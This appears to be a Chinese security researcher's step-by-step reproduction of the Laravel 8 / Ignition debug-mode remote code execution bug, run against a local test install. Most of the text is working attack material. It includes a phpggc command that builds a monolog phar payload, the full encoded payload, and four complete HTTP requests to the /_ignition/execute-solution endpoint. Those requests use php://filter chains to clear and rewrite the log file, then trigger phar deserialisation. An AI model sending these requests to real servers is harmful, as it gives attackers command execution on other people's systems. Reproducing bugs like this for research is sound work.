laravel-8-4-2-DEBUG-MODE-RCE复现

安装

git clone <https://github.com/laravel/laravel.git>
cd laravel
composer config -g repo.packagist composer <https://mirrors.aliyun.com/composer/>
composer require laravel/framework==8.4.0
composer require facade/ignition==2.5.0
mv .env.example .env
php artisan key:generate --ansi

复现之旅

清空laraverl.log

注意，这里重放最好多点几次。

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=PHPSTORM; UM_distinctid=1757d9bc9a5196-0565eb0dfb9da7-445d6f-12026a-1757d9bc9a67cc; CNZZDATA1263340672=1296729003-1604125074-%7C1604125074; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1605952023,1606037840; pma_lang=zh_CN; XSRF-TOKEN=eyJpdiI6InJmVnozUFhYQ1RXVTl5WWsxeEwvU0E9PSIsInZhbHVlIjoiZE4yN1ZuaFBPUUJmS1dyZGFLaEh0RmZIR0Yxck1GN3ZXc3BoVjRwWlRQODVNcG5JWXlkV1BMbU5vd1V6UlBjMWYxbG41bGpVRk9xOXNjYytLSmIrRzBzUmtoYUhlMEdwdjZwWE1iL3lEa1pGcVd4cXMzNVpQblhOOHJqTHlaOFMiLCJtYWMiOiIyMTQ2YmMyYTA0NTA1NWUwYWI4ZTMyYTU4ZjFkN2UwNDRlYzNlOWVmOGMyNmZmZWEwNmUyOTc2YzcxNGU1Yzk0In0%3D; laravel_session=eyJpdiI6IjZOTDFHT1pDbDZocDZUUHdtbzB1S1E9PSIsInZhbHVlIjoiT0xjdG5zL2dlY1hqYUNtZXI1a0ljUFZWdS9tM3h1WEZwT2dQUE1oWWJOL2xlaGNYYWJaRVk5YXhzVVRWczhHQ3ZyOHIxdWdHNXRvalczbUNyeUR6SGRRd1ZGQ2RTZkpnNm9MTUR6TWZETU1WRGVsV2RaWXFQeHhHUEVxSUY0T1UiLCJtYWMiOiI4ZDgwMmRmZWM1M2Y2NzMyNmY0ODc1ZDVhYzI3NTFkNmE3MGUzZDU1MDg2YzJlZWJjODRmM2I5YTgxZTUyNDIxIn0%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 284

{"solution":"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution","parameters":{	"variableName":"usesname","viewFile":"php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

打laravel.log

php -d'phar.readonly=0' ./phpggc monolog/rce1 system ls --phar phar -o php://output | base64 -w0

然后生成的payload用下面编码

import base64
s = 'payload'
''.join(["=" + hex(ord(i))[2:] + "=00" for i in s]).upper()
POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=PHPSTORM; UM_distinctid=1757d9bc9a5196-0565eb0dfb9da7-445d6f-12026a-1757d9bc9a67cc; CNZZDATA1263340672=1296729003-1604125074-%7C1604125074; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1605952023,1606037840; pma_lang=zh_CN; XSRF-TOKEN=eyJpdiI6InJmVnozUFhYQ1RXVTl5WWsxeEwvU0E9PSIsInZhbHVlIjoiZE4yN1ZuaFBPUUJmS1dyZGFLaEh0RmZIR0Yxck1GN3ZXc3BoVjRwWlRQODVNcG5JWXlkV1BMbU5vd1V6UlBjMWYxbG41bGpVRk9xOXNjYytLSmIrRzBzUmtoYUhlMEdwdjZwWE1iL3lEa1pGcVd4cXMzNVpQblhOOHJqTHlaOFMiLCJtYWMiOiIyMTQ2YmMyYTA0NTA1NWUwYWI4ZTMyYTU4ZjFkN2UwNDRlYzNlOWVmOGMyNmZmZWEwNmUyOTc2YzcxNGU1Yzk0In0%3D; laravel_session=eyJpdiI6IjZOTDFHT1pDbDZocDZUUHdtbzB1S1E9PSIsInZhbHVlIjoiT0xjdG5zL2dlY1hqYUNtZXI1a0ljUFZWdS9tM3h1WEZwT2dQUE1oWWJOL2xlaGNYYWJaRVk5YXhzVVRWczhHQ3ZyOHIxdWdHNXRvalczbUNyeUR6SGRRd1ZGQ2RTZkpnNm9MTUR6TWZETU1WRGVsV2RaWXFQeHhHUEVxSUY0T1UiLCJtYWMiOiI4ZDgwMmRmZWM1M2Y2NzMyNmY0ODc1ZDVhYzI3NTFkNmE3MGUzZDU1MDg2YzJlZWJjODRmM2I5YTgxZTUyNDIxIn0%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 6300

{"solution":"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution","parameters":{	"variableName":"usesname","viewFile":"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=79=00=4F=00=69=00=4A=00=73=00=63=00=79=00=49=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=57=00=51=00=69=00=4F=00=32=00=49=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=4D=00=61=00=57=00=31=00=70=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=62=00=33=00=4A=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6E=00=4A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=49=00=36=00=49=00=6D=00=78=00=7A=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=75=00=6A=00=49=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=75=00=6A=00=49=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=45=00=4E=00=71=00=34=00=2F=00=73=00=41=00=6D=00=51=00=36=00=54=00=56=00=31=00=33=00=39=00=64=00=36=00=2F=00=78=00=58=00=39=00=64=00=58=00=4C=00=4D=00=65=00=64=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00"}}

生成phar

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=PHPSTORM; UM_distinctid=1757d9bc9a5196-0565eb0dfb9da7-445d6f-12026a-1757d9bc9a67cc; CNZZDATA1263340672=1296729003-1604125074-%7C1604125074; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1605952023,1606037840; pma_lang=zh_CN; XSRF-TOKEN=eyJpdiI6InJmVnozUFhYQ1RXVTl5WWsxeEwvU0E9PSIsInZhbHVlIjoiZE4yN1ZuaFBPUUJmS1dyZGFLaEh0RmZIR0Yxck1GN3ZXc3BoVjRwWlRQODVNcG5JWXlkV1BMbU5vd1V6UlBjMWYxbG41bGpVRk9xOXNjYytLSmIrRzBzUmtoYUhlMEdwdjZwWE1iL3lEa1pGcVd4cXMzNVpQblhOOHJqTHlaOFMiLCJtYWMiOiIyMTQ2YmMyYTA0NTA1NWUwYWI4ZTMyYTU4ZjFkN2UwNDRlYzNlOWVmOGMyNmZmZWEwNmUyOTc2YzcxNGU1Yzk0In0%3D; laravel_session=eyJpdiI6IjZOTDFHT1pDbDZocDZUUHdtbzB1S1E9PSIsInZhbHVlIjoiT0xjdG5zL2dlY1hqYUNtZXI1a0ljUFZWdS9tM3h1WEZwT2dQUE1oWWJOL2xlaGNYYWJaRVk5YXhzVVRWczhHQ3ZyOHIxdWdHNXRvalczbUNyeUR6SGRRd1ZGQ2RTZkpnNm9MTUR6TWZETU1WRGVsV2RaWXFQeHhHUEVxSUY0T1UiLCJtYWMiOiI4ZDgwMmRmZWM1M2Y2NzMyNmY0ODc1ZDVhYzI3NTFkNmE3MGUzZDU1MDg2YzJlZWJjODRmM2I5YTgxZTUyNDIxIn0%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 300

{"solution":"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

rce

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=PHPSTORM; UM_distinctid=1757d9bc9a5196-0565eb0dfb9da7-445d6f-12026a-1757d9bc9a67cc; CNZZDATA1263340672=1296729003-1604125074-%7C1604125074; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1605952023,1606037840; pma_lang=zh_CN; XSRF-TOKEN=eyJpdiI6InJmVnozUFhYQ1RXVTl5WWsxeEwvU0E9PSIsInZhbHVlIjoiZE4yN1ZuaFBPUUJmS1dyZGFLaEh0RmZIR0Yxck1GN3ZXc3BoVjRwWlRQODVNcG5JWXlkV1BMbU5vd1V6UlBjMWYxbG41bGpVRk9xOXNjYytLSmIrRzBzUmtoYUhlMEdwdjZwWE1iL3lEa1pGcVd4cXMzNVpQblhOOHJqTHlaOFMiLCJtYWMiOiIyMTQ2YmMyYTA0NTA1NWUwYWI4ZTMyYTU4ZjFkN2UwNDRlYzNlOWVmOGMyNmZmZWEwNmUyOTc2YzcxNGU1Yzk0In0%3D; laravel_session=eyJpdiI6IjZOTDFHT1pDbDZocDZUUHdtbzB1S1E9PSIsInZhbHVlIjoiT0xjdG5zL2dlY1hqYUNtZXI1a0ljUFZWdS9tM3h1WEZwT2dQUE1oWWJOL2xlaGNYYWJaRVk5YXhzVVRWczhHQ3ZyOHIxdWdHNXRvalczbUNyeUR6SGRRd1ZGQ2RTZkpnNm9MTUR6TWZETU1WRGVsV2RaWXFQeHhHUEVxSUY0T1UiLCJtYWMiOiI4ZDgwMmRmZWM1M2Y2NzMyNmY0ODc1ZDVhYzI3NTFkNmE3MGUzZDU1MDg2YzJlZWJjODRmM2I5YTgxZTUyNDIxIn0%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 196

{"solution":"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"phar:///Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

安装

复现之旅

清空laraverl.log

打laravel.log

生成phar

rce

后续